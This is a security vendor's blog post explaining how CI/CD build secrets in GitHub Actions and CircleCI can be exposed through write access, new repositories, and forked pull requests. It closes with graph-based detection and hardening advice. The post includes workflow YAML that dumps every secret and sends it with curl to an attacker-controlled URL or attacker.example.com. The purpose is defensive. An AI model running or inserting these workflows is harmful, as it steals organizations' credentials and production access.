All Roads Lead to Build Secrets – Or How Your Build System Could Expose The Production Environment

Every software manufacturer nowadays implements robust DevOps processes to increase its ability to deliver applications and services at high velocity. These processes usually include testing, building, packaging, deploying, and other automated procedures.

This article will demonstrate that the race to embrace CI/CD capabilities has introduced subtle new risks. An especially significant risk that most organizations fail to recognize is secrets in the build system.

While secrets in source code result from missing best practices, secrets in build systems are essential for creating meaningful workflows that communicate and authenticate with various services, such as cloud providers, artifact registries, package managers, ticketing systems, messaging apps, etc. Usually, when you store these secrets, they are well-encrypted and revealed only inside the specific builds authorized to access them.

Let’s imagine the following organization – a software development company named “OrdinaryCompany” uses a private GitHub organization to store its code and both GitHub Actions and CircleCI as CI/CD platforms, with the workflows defined as part of the repositories. The issues we will discuss in this post also apply to other popular tools – GitLab, Jenkins, Bitbucket, TravisCI, JFrog Pipelines, TeamCity, etc.

“OrdinaryCompany” implements standard workflows for building code into a container image, pushing the package to Docker Hub, and deploying it to an Elastic Kubernetes Service (EKS) cluster on AWS. To implement this, the company must store build secrets that allow the build procedure to authenticate with each of the relevant systems (a minimal workflow sketch follows the list):

  • Cloning the repository – requires the use of a GitHub token or an SSH key
  • Packaging and pushing the container – requires the use of a Docker Hub token
  • Deploying the image to the EKS cluster – requires the use of an AWS token
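
A minimal GitHub Actions sketch of such a workflow might look like the following (the secret names, image name, cluster name, and file path are illustrative assumptions, not “OrdinaryCompany”’s actual configuration):

# .github/workflows/build.yml (hypothetical path)
name: Build and Deploy

on:
  push:
    branches: [main]

jobs:
  build-and-deploy:
    runs-on: ubuntu-latest
    steps:
      # Cloning the repository (uses the run's built-in GITHUB_TOKEN)
      - uses: actions/checkout@v3
      # Authenticating to Docker Hub with the stored token
      - uses: docker/login-action@v2
        with:
          username: ${{ secrets.DOCKERHUB_USERNAME }}
          password: ${{ secrets.DOCKERHUB_TOKEN }}
      # Packaging and pushing the container image
      - run: |
          docker build -t ordinarycompany/app:${{ github.sha }} .
          docker push ordinarycompany/app:${{ github.sha }}
      # Deploying the image to the EKS cluster with stored AWS credentials
      - run: |
          aws eks update-kubeconfig --name production-cluster
          kubectl set image deployment/app app=ordinarycompany/app:${{ github.sha }}
        env:
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          AWS_DEFAULT_REGION: us-east-1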

The company “OrdinaryCompany” is a large enterprise, and its motivated CISO implemented exceptional segregation of duties. Only a few select employees have direct access to the production (AWS/Docker Hub) environment, their access is enforced by MFA, and all of their activity is monitored. The CISO’s intention is crystal clear – from a software supply chain security perspective, any malicious entry into the cloud environment or the artifact registry could compromise the entire client base of the enterprise.

Source Control as a Build System

Over the past several years, we have witnessed build procedures transition from being defined in the build systems (for example, pipelines in Jenkins) to being defined in source control systems. This developer-centric experience helps speed up the development process. It is a significant milestone in the GitOps paradigm – ensuring that the Git repository always contains a declarative description of the infrastructure currently desired in the production environment, along with an automated process to make the production environment match the state described in the repository.

In the case of GitHub Actions, committing a YAML file into the .github/workflows path creates an automated pipeline that can be triggered when certain events happen. We will not dive into GitHub Actions’ technical details here; you are welcome to check our previous blog post explaining its core mechanics, including how an attacker can leverage vulnerable configurations to achieve code execution.

Use Case No. 1: Encrypted Build Secrets in GitHub Repositories Are Not as Safe as They Seem

The organization, “OrdinaryCompany”, added a Docker Hub token as a GitHub Actions secret to allow the build pipeline to push built packages to the organization’s Docker Hub account.

They also followed GitHub’s complete security guidelines, including limiting the scope of stored tokens and defining them only in the repositories that require them. The CISO also read that secrets defined in GitHub are so well-encrypted that even GitHub can’t access them, so he felt comfortable using them.

But encryption is not necessarily equal to confidentiality. Developers usually have “write” access to the Git repository to which they commit code. Even creating additional branches (not just pushing to the main branch) requires “write” permission, which applies to the entire repository.

With such permissions, a developer could easily create a new GitHub Actions workflow that exfiltrates all exposed repository and organization secrets to an externally controlled server. This means the developer gains access to the production environment!

Let’s explain – having “write” access doesn’t mean the developer gets the decryption keys for the secrets. Still, they can construct a new build pipeline and instruct the GitHub Actions service, which does hold the decryption keys, to exfiltrate all secrets.

The YAML file that describes such a workflow looks like the following:

name: Secrets

# Manually triggered; the attacker supplies the URL of a server they control
on:
  workflow_dispatch:
    inputs:
      url:
        required: true

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      # Dump every secret exposed to this workflow and POST it to the attacker-supplied URL
      - run: |
          echo "${{ toJSON(secrets) }}" > .secrets
          curl -X POST -s --data "@.secrets" ${{ github.event.inputs.url }} > /dev/null

Currently, GitHub doesn’t have granular enough permission controls to separate duties within a repository’s files: creating a new workflow and updating a documentation file fall under the same permission set.

While this may seem exaggerated, the risk is genuine:

  • Organizations give developers control over pushing new code, but they aren’t willing to give them complete control of the production environment. The fact that push access can effectively grant such control motivates attackers to focus on compromising developers’ accounts and increases the risk of insider threats.
  • According to Gartner, software supply-chain risks are rising and will continue to grow in 2022. An effective vector for software supply-chain attacks is through developer accounts and workstations.

You may also think that protecting branches (like the main branch) will prevent this attack vector. It won’t; an attacker could simply create an additional, non-protected branch, add a workflow triggered on the pull_request event, and open a pull request to the main branch. This triggers the malicious workflow, which can exfiltrate the same secrets available to workflows on the main branch.
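
A minimal sketch of such a pull_request-triggered workflow, committed to the non-protected branch (the receiving URL is an illustrative placeholder):

name: PR Build

# Triggered when a pull request is opened or updated
on:
  pull_request:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      # For a pull request from a branch in the same repository, the Actions service
      # decrypts the secrets for this run, just as it would on the main branch
      - run: |
          echo "${{ toJSON(secrets) }}" > .secrets
          curl -X POST -s --data "@.secrets" https://attacker.example.com/collect > /dev/null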

Use Case No. 2: Build Secrets are Accessible in New Repositories

Once the “OrdinaryCompany” CISO noticed this “loophole”, he immediately hardened the SDLC process by removing most of the “write” permissions to the sensitive repositories and forcing code to be merged through forked pull requests. The development team didn’t like it, but it solved the security issue.

But it is not over yet.

Our organization has several repositories on GitHub that need to use the Docker Hub token, so it must be defined at the organization level. In addition, like most organizations, “OrdinaryCompany” has enabled two options that allow it to develop software quickly:

  1. Allowing all members to create new repositories – developers constantly create new repositories for research and development. This is the default option.
  2. Default GitHub settings permit all repositories to run GitHub Actions – this means all newly created repositories are automatically allowed to run actions without waiting for administrator approval.

Combining all these options enables an interesting attack vector – any member in the organization can create a new repository with default write access permissions and use it to create a new GitHub Actions workflow to exfiltrate organization secrets!

When we create a new repository, we can immediately see the organization secrets that the repository is exposed to.

Use Case No. 3: Exposing Build Secrets through Forked Pull Requests

The CISO was shocked by this security loophole, so he asked the organization administrator to expose the organization’s secrets only to the relevant repositories through the organization settings panel.

From this point onward, any new repository won’t have immediate access to sensitive secrets.

At this point, it seems like we’ve reached the end of this attack vector, right? Nope!

We mentioned that our organization also uses CircleCI for other builds. As a result of the “Use Case No. 1” mitigation, most developers don’t have “write” permissions to the repositories, so the only way to contribute code is by creating forked pull requests. Thus, to allow the creation of meaningful workflows, the DevOps engineer enabled running builds on forked pull requests and also passing secrets to such runs through the CircleCI project settings.

The usage may vary – deploying to the testing environment with web-preview abilities, integrating with a vulnerability scanner of choice, integrating with Slack for notifications, running static analysis, integrating with Jira for creating issues, etc.

This means that every developer with at least “read” permissions (the default) can fork the repository, create a new CircleCI workflow, send a pull request, and trigger the build workflow. This workflow could exfiltrate all CircleCI project secrets!
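
A rough sketch of what a malicious .circleci/config.yml in such a fork could look like (the collection URL is an illustrative placeholder):

version: 2.1

jobs:
  exfiltrate:
    docker:
      - image: cimg/base:stable
    steps:
      # Project environment variables, including secrets passed to forked-PR builds,
      # are available to this job and can simply be dumped and sent out
      - run: env | curl -X POST -s --data-binary @- https://attacker.example.com/collect

workflows:
  build:
    jobs:
      - exfiltrate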

What Can We Learn From It?

We showcased three cases in which a set of standard configurations broke the security model inside an organization, and this is only the tip of the iceberg. While none of these issues is impossible to mitigate, they all stem from the internal security model of the SCM or the build system, which can be subtle and time-consuming to understand. The result is that security teams do not see the entire risk posture of their organization.

In our opinion, these issues stem from several root causes:

  • Nowadays, most organizations work with dozens of CI/CD and cloud systems. Some of these systems do offer best practices and suggested configurations. Still, it is the organization’s role to look at everything from a high-level perspective, and the complexity of understanding each system’s nuances increases the risk of inadvertent misconfigurations.
  • We need to understand that GitOps transforms SCM systems into build systems for many organizations. Today, any developer can create builds on closed, private build systems that hold sensitive secrets. This intimate relationship should be addressed in the organization’s risk assessment, with least-privilege policies granular enough to create effective separation of duties.
  • The CI/CD and cloud-native industry is developing at an incredible pace. Many vendors invest in their CI/CD platforms and answer client requests without sufficient security consideration.

Graph-based Queries – Problem or Solution?

John Lambert, the founder of the Microsoft Threat Intelligence Center, published an article titled “Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win.” The use cases we mentioned previously fit this observation exceptionally well.

In big enterprises with thousands of repositories, dozens of GitHub organizations, and tons of sensitive secrets, a dedicated attacker will find their way to the holy-grail secret that provides access to the production environment, with severe security implications.

Each platform (such as GitHub or CircleCI) can be complex to understand, and it does not always make clear how its configuration affects other steps in the process. To understand the logical connections behind the issues we presented, try to answer the following guiding questions:

  • How do organization and repository settings affect the security posture of your CI/CD process?
    • As we saw previously, each setting has a different effect: who can create repositories, whether Actions are allowed, whether secrets are passed to forked pull requests, the default permissions for members, the default permissions for GITHUB_TOKEN, and more.
  • Which members have excessive access to organization assets?
    • This can be complex because assets can have many relationships – members of organizations, members of teams, teams with access to repositories, outside collaborators, organization base permissions, and more.
  • How can you best implement the principle of least privilege?

It can be difficult, if not impossible, to answer these questions with current tooling. Unless… you start to think in graphs!

Identifying Issues Through Graph Queries

By modeling the security posture of every CI/CD system in a graph database, we can conduct smart queries to understand our risks and even alert when exceptions happen.

Use Case No. 1

We showed that developers who have “write” permissions to the repository could exfiltrate sensitive repository and organization secrets. This could easily be modeled in a graph by looking at the following connections:

  • The repository has access to secrets (which could be organization secrets as well)
  • Users have at least “write” permissions to the repository, whether through:
    • Organization base permission
    • Team permission
    • Direct repository permission

For example, if we want to monitor our AWS token, we can query all the users that have potential access to it.

Use Case No. 2

In the second threat, we showed that organization secrets could be exposed by creating new repositories in which Actions are allowed to run. We can identify this threat by creating relations between the build secrets and the organization and combining them with several additional filters:

  • Does the organization allow creating new repositories? Private and public?
  • Does the organization allow running GitHub Actions for all repositories?
  • Are the secrets exposed to all repositories? Only to private ones?

So when we combine these, we can quickly identify such secrets and mitigate them appropriately.

Use Case No. 3

This issue stems from secrets being sent to forked pull request builds in CircleCI.

The modeling will combine several conditions:

  • The CircleCI project contains secrets
  • The CircleCI project is configured to build forked pull requests
  • The CircleCI project is configured to pass secrets to forked pull requests
  • Users have at least “read” permissions to the repository, whether through:
    • Organization base permission
    • Team permission
    • Direct repository permission

What Can We Do Now?

This article won’t give a cookbook for securing the entire SDLC process, but we’ll try to provide some guidelines.

Understanding the threat landscape

The issues we presented don’t end with GitHub and CircleCI but apply to all modern CI/CD systems; for example, the repository may contain a Jenkinsfile, .gitlab-ci.yml, .travis.yml, and more.

The first part of mitigating threats is understanding them. This must come from visibility:

  1. Identifying the critical assets – Code repositories? Production environment? Packages?
  2. Understanding where your assets are stored – Specific repositories on GitHub? The build system on GitLab? Or maybe secrets in Jenkins?
  3. Understanding the access relations inside your organization – Which entities can access the areas defined as containing assets? This includes users, bots, third-party applications, and more.

Hardening the pipeline

At first, it may seem that identifying the relations and conducting a proper risk assessment inside the organization is most of the work of securing your CI/CD process, but finding the right solutions to mitigate the risks can be tricky. It demands extensive research to understand the proper hardening for the dozens of systems your organization may use.

  • If you use a build system inside your SCM, whether at the organization level or for a single repository, treat the risks accordingly. This means double-checking all the default permissions for the organization, the specific permissions for each repository, and who can write to and manipulate your build process.
  • The ideal solution would be to separate the build process from the rest of the code development. For example:
    • Keep the core development in the GitHub organization, and define the build process in a completely different repository, organization, or even another platform (such as GitLab).
    • Every code push or pull request to the central repository calls a webhook that triggers the build process, without an external actor being able to alter it.
    • If you intend to adhere to SLSA specifications, you must implement similar solutions for the “Non-falsifiable” requirement.
    • This concept is demonstrated in this article by GitHub, which shows how to achieve SLSA 3 through reusable workflows; a sketch of the calling side follows below.
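
For illustration, the calling side in the application repository might look like the following sketch (the reusable workflow's repository, path, and secret name are hypothetical):

name: Build via Reusable Workflow

on:
  push:
    branches: [main]

jobs:
  build:
    # The actual build logic lives in a separate, tightly controlled repository
    uses: ordinarycompany/build-workflows/.github/workflows/container-build.yml@main
    secrets:
      dockerhub_token: ${{ secrets.DOCKERHUB_TOKEN }}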

How Cycode Solves It

By utilizing its knowledge graph, Cycode can deliver the security insights you need to identify and mitigate the risks inside your organization. Our research team identifies the pitfalls of every system in the CI/CD pipeline and its possible connections to other systems. Using this knowledge, you can inspect all the logical connections in your organization, and we can deliver security intelligence to protect your assets.

One of the most notable features of the knowledge graph is its ability to generate complex insights by analyzing data from multiple points of the software delivery pipeline. This produces more accurate insights, provides new learnings, and helps improve visibility across the various tools and binaries used throughout the development environments.

Want To Learn More?

A great place to start is with a free assessment of the security of your DevOps pipeline.